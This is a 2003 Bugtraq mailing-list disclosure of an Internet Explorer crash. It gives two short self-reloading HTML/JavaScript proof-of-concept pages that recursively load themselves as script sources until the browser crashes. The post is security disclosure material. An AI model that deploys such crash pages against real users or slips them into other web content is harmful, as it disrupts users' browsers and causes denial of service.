
Date: 7 Jul 2003 22:49:47 -0000
From: Digital Scream <digitalscream@...l.xakep.ru>
To: bugtraq@...urityfocus.com
Subject: Internet Explorer Crash




The following example, results in crash:

--------------------[Crash.html]--------------------
window.moveTo(screen.width,screen.height);
document.all.tags("script")[0].src="Crash.html";
//&lt;script src="Crash.html">&lt;/script&gt;
-----------------[End of Crash.html]----------------

The result is influenced with set of factors, amount of copies Internet 
Explorer and symbols in the document.

In that specific case, there is an opportunity to foresee the moment of 
crash. For example, if openly one window of Internet Explorer:

--------------------[Demo.html]--------------------
if(!window.counter)
{
	window.counter=1;
	alert("Internet Explorer will be crashed after 3-5 cycle");
}
window.counter++;
alert(window.counter);
document.all.tags("script")[0].src="demo.html";
//&lt;script src="demo.html">&lt;/script&gt;
-----------------[End of Demo.html]----------------

Grtz: UInC Team


